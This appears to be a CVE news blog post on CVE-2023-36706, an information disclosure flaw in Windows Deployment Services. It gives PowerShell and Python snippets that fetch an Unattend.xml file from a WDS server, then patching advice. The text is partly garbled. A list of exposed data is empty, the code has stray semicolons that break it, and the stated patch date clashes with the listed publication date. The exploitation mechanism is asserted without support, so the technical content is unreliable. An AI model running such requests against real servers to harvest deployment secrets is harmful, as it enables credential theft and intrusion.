CVE CyberSecurity Database News

CVE-2023-36706 - Breaking Down the Windows Deployment Services Info Disclosure Vulnerability

Poster -

Windows Deployment Services (WDS) helps IT pros and admins deploy Windows systems quickly. But like any powerful tool, it can become a doorway for hackers—especially when you have vulnerabilities like CVE-2023-36706 hanging around. Let’s walk through what this info disclosure bug means, why you should care, and how it can be exploited (with some simple code examples).

What is CVE-2023-36706?

CVE-2023-36706 is an “Information Disclosure Vulnerability” in Windows Deployment Services (WDS). That means attackers could peek at sensitive data they shouldn’t have access to.

Attack complexity: Low

In simple words: If your organization uses WDS, attackers could potentially pull information off your deployment server and use it to push deeper into your network.

*Official Microsoft Security Advisory:*
- CVE-2023-36706 | Windows Deployment Services Information Disclosure Vulnerability

How Does This Vulnerability Work?

WDS lets admins set up a server that dishes out Windows images over the network to new or wiped machines. Certain flaws in how WDS handles requests can allow unauthorized (possibly unauthenticated) users to retrieve files or configuration data they shouldn’t be able to! This can include:

The Exploit: What Could Go Wrong

WDS's flaw is rooted in loose security checks for certain network requests—think of it like an open server window on a ground floor.

For example:
When a client asks for certain files (like unattended configuration XMLs), WDS sometimes hands them over without proper authentication.

Example: Unauthorized File Access

Let's say the server is at 192.168.1.50
The attacker could use simple network tools (like PowerShell or Python) to request a sensitive config:

PowerShell Snippet

# Replace with the actual file path the WDS server exposes
Invoke-WebRequest -Uri "http://192.168.1.50:81/remotepath/Unattend.xml"; -OutFile "Unattend.xml"

Python Example

import requests

server = "http://192.168.1.50:81/remotepath/Unattend.xml";
resp = requests.get(server)
if resp.status_code == 200:
    with open("Unattend.xml", "w") as f:
        f.write(resp.text)
    print("[+] File downloaded successfully")
else:
    print(f"[-] Error: {resp.status_code}")

Other sensitive deployment secrets

In real attacks, the "remotepath/Unattend.xml" would be guessed or discovered with more advanced enumeration, but the principle is the same.

What’s the Real Risk?

In an internal network (especially in big organizations), WDS often runs wide open. Attackers _inside_ (or who’ve breached Wi-Fi/physical security) can just poke at WDS for secrets. Even if protected by AD/NTFS permissions, misconfigurations are common.

Mitigation: How Do I Fix It?

Luckily, Microsoft published a patch for this. If you’re running Windows Server 2012/2016/2019/2022 with WDS, UPDATE NOW.

Install Windows updates from September 12, 2023 or later.

- Restrict access to the WDS server (network ACLs/firewalls)
- Review deployment images/config for leaked passwords

*Patch reference:*
Microsoft Update Catalog

Tip: Always check your Unattend.xml and other config files for hardcoded passwords and limit their exposure.

References

- Microsoft CVE-2023-36706 Advisory
- WDS Hardening Guide (Microsoft Docs)
- Attacking Windows Deployment Services – labs

Conclusion: Why Should You Care?

CVE-2023-36706 proves that sometimes, the keys aren’t locked away—they’re lying on the dashboard. If you use WDS, patch now, review your deployment config for secrets, and treat internal tools with as much respect as your external-facing ones. Attackers know about these holes—don’t leave the blinds open.

Timeline

Published on: 10/10/2023 18:15:15 UTC
Last modified on: 10/12/2023 22:22:35 UTC